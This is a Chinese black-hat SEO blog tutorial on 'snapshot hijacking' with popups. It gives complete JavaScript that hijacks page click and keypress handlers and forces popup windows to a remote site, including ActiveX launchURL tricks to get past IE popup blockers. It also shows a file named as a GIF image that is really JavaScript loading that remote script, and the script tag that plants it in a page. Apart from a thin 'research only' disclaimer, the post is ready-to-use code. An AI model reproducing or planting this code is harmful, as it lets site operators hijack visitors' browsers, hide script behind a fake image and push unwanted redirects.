黑帽seo利用GIF图片制作快照劫持挂马弹窗

黑帽seo利用GIF图片制作快照劫持挂马弹窗,风酷seo在这里只是针对百度快照优化做了一个小小的解密,不支持各位大神用于黑帽,在此仅仅作为GIF图片制作快照劫持挂马弹窗的研究,废话不多说,继续阅读:

黑帽seo利用GIF图片制作快照劫持挂马弹窗

第一步:用editplus新建文件fengku.js,输入以下内容:

var objdate = new Date();
 var _hasqyp = 0,
 _reqqyp = 0,
 _clkqyp = 0,
 _redy_webkit = 0;
 function strtc() {
 var d = navigator.userAgent;
 var a = {};
 a.ver = {
 ie: /MSIE/.test(d),
 ie6: !/MSIE 7\.0/.test(d) && /MSIE 6\.0/.test(d) && !/MSIE 8\.0/.test(d) && !/MSIE 9\.0/.test(d),
 oldie: /MSIE 6\.0/.test(d) || /MSIE 7\.0/.test(d) || /MSIE 8\.0/.test(d),
 tt: /TencentTraveler/.test(d),
 i360: /360SE/.test(d),
 webkit: /WebKit/.test(d),
 cr: /Chrome/.test(d),
 sf: /Safari/.test(d),
 op: /Opera/.test(d),
 sg: /MetaSr/.test(d),
 mt: /Maxthon/.test(d) && /WebKit/.test(d),
 gg: window.google && window.chrome,
 _v1: '<object id="_pp_CIS0516_qy01" width="0" height="0" classid="CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6"></object>',
 _v2: '<object id="_pp_CIS0516_qy02" style="position:absolute;left:1px;top:1px;width:1px;height:1px;" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"></object>',
 _v3: '<div id="kd_CIS0516_pp" style="display:none;"><form action="" method="post" name="__form_kdpp" target="_blank"><input type="submit" style="display:none;" value="test" id="__sumit_kdpp"/></form></div>'
 };
 if (a.ver.ie || a.ver.tt) {
 document.write(a.ver._v1);
 document.write(a.ver._v2)
 }
 if (a.ver.cr || a.ver.sf) {
 document.write(a.ver._v3)
 }
 a.fs = null;
 a.fdc = null;
 a.kd = null;
 a.ah = null;
 a.ad = null;
 a.timeid = 0;
 a.w = 0;
 a.h = 0;
 a.url = null;
 a.reurl = null;
 a.init = function() {
 try {
 if (typeof document.body.onclick == "function") {
 a.fs = document.body.onclick;
 document.body.onclick = null
 }
 if (typeof document.onclick == "object") document.onclick = function() {
 a.click_CIS0516_pp()
 };
 else if (typeof document.onclick == "function") {
 if (document.onclick.toString().indexOf('click_CIS0516_pp') < 0) {
 a.fdc = document.onclick;
 document.onclick = function() {
 a.click_CIS0516_pp()
 }
 }
 }
 if (typeof document.onkeydown == "object" && a.ver.webkit) document.onkeydown = a.kdopen;
 else if (typeof document.onkeydown == "function" && a.ver.webkit) {
 if (document.onkeydown.toString().indexOf('__form_kdpp') < 0) {
 a.kd = document.onkeydown;
 document.onkeydown = a.kdopen
 }
 }
 } catch(q) {}
 };
 a.uinit = function() {
 try {
 document.body.onclick = a.fs;
 document.onclick = a.fdc;
 if (a.ver.webkit) document.onkeydown = a.kd;
 if (a.timeid > 0) clearInterval(a.timeid);
 a.timeid = 0
 } catch(q) {};
 a.reopen(a.w, a.h)
 };
 a.kdopen = function() {
 var d = document;
 var f = d.forms["__form_kdpp"];
 f.setAttribute('action', a.url);
 try {
 f.submit()
 } catch(e) {
 d.getElementById("__sumit_kdpp").click()
 }
 window.focus();
 _hasqyp++;
 a.uinit()
 };
 a.click_CIS0516_pp = function() {
 a.wopen(a.url, a.w, a.h);
 _hasqyp++;
 a.uinit()
 };
 a.reopen = function(e, f) {
 a.url = xurl[_hasqyp];
 if (_hasqyp < _reqqyp) setTimeout(function() {
 __qy_pop_up.open()
 },
 _qyrep_time * 1000);
 else if (_hasqyp < _reqqyp + _clkqyp) {
 setTimeout(function() {
 __qy_pop_up.open()
 },
 100)
 }
 };
 a.wopen = function(c, e, f) {
 var b = 'height=' + f + ',width=' + e + ',left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes';
 if (a.ver.sg || a.ver.mt) var j = 'window.open("/", "_blank", "' + b + '")';
 else var j = 'window.open("' + c + '", "_blank", "' + b + '")';
 var m = null;
 try {
 m = eval(j)
 } catch(q) {}
 if (m) {
 if (a.ver.sg || a.ver.mt) m.location.href = c;
 m.blur();
 window.focus();
 return true
 }
 var i = this,
 j = false;
 if (a.ver.ie || a.ver.tt) {
 document.getElementById("_pp_CIS0516_qy01");
 document.getElementById("_pp_CIS0516_qy02");
 var obj = document.getElementById("_pp_CIS0516_qy02");
 if (!obj) return;
 var wPop = null;
 try {
 var wPop = obj.DOM.Script.open(c, "_blank", b)
 } catch(q) {}
 if (wPop) {
 wPop.blur();
 window.focus();
 return true
 }
 try {
 document.getElementById("_pp_CIS0516_qy01").launchURL(c);
 return true
 } catch(q) {}
 }
 return false
 };
 a.open = function(c, d, e, f) {
 if (_hasqyp >= _reqqyp + _clkqyp) return;
 if (c) {
 a.url = c
 }
 if (d) {
 a.reurl = d
 }
 if (e) {
 a.reurls = e
 }
 e = e > 1 ? e: window.screen.width;
 f = f > 1 ? f: window.screen.height;
 a.w = e;
 a.h = f;
 if (a.timeid == 0) a.timeid = setInterval(a.init, a.ver.oldie ? 15 : 5);
 if (_hasqyp < _reqqyp && !a.ver.gg && !a.ver.cr && !a.ver.op && !a.ver.sg && !a.ver.mt) {
 if (a.wopen(a.url, a.w, a.h)) {
 _hasqyp++;
 a.uinit();
 return
 }
 }
 };
 window.__qy_pop_up = a
 };
 function setCookie(tcname, value, expire) {
 window.document.cookie = tcname + "=" + escape(value) + ((expire == null) ? "": ("; expires=" + expire.toGMTString()))
 }
 function getCookie(tcname) {
 var search = tcname + "=";
 if (window.document.cookie.length > 0) {
 offset = window.document.cookie.indexOf(search);
 if (offset != -1) {
 offset += search.length;
 end = window.document.cookie.indexOf(";", offset);
 if (end == -1) end = window.document.cookie.length;
 return unescape(window.document.cookie.substring(offset, end))
 }
 }
 return null
 }
 function register(tcname, daynum) {
 var today = new Date();
 var expires = new Date();
 //expires.setTime(today.getTime() + 1000 * 60 * 60 * daynum);
 expires.setTime(-1);
 setCookie("tcname_s", tcname, expires)
 };
 var _qyrep_time = 5;
 var daynum = 240;
 xurl = new Array('http://www.fengku.net/');
 _reqqyp = xurl.length;
 if (!qypp_code) {
 var qypp_code = 1;
 setTimeout(function() {
 __qy_pop_up.open(xurl[0])
 },
 35000);
 var c = getCookie("tcname_s");
 if (c != null) {} else {
 strtc();
 register("tcname_s", daynum)
 }
 };

 

第二步建立fengku.gif 输入以下内容:

document.writeln("<script src=\"http://www.fengku.net/fengku.js\"></script>");
 if (top.location != self.location)
 {top.location=self.location;}
 function formatonlinpic()
 {var picobj=document.getElementsByName("onlinepic");
 var picnum=picobj.length;
 for(var i=0;i<picnum;i++)
 {if(picobj[i].width>200)
 {picobj[i].width=200;}
 if(picobj[i].height>200)
 {picobj[i].height=200;}}}

 

接下来就是调用了:

<script src="http://www.fengku.net/fengku.gif"></script>

转载请注明出处::【风酷seo网站优化排名公司】 » 黑帽seo利用GIF图片制作快照劫持挂马弹窗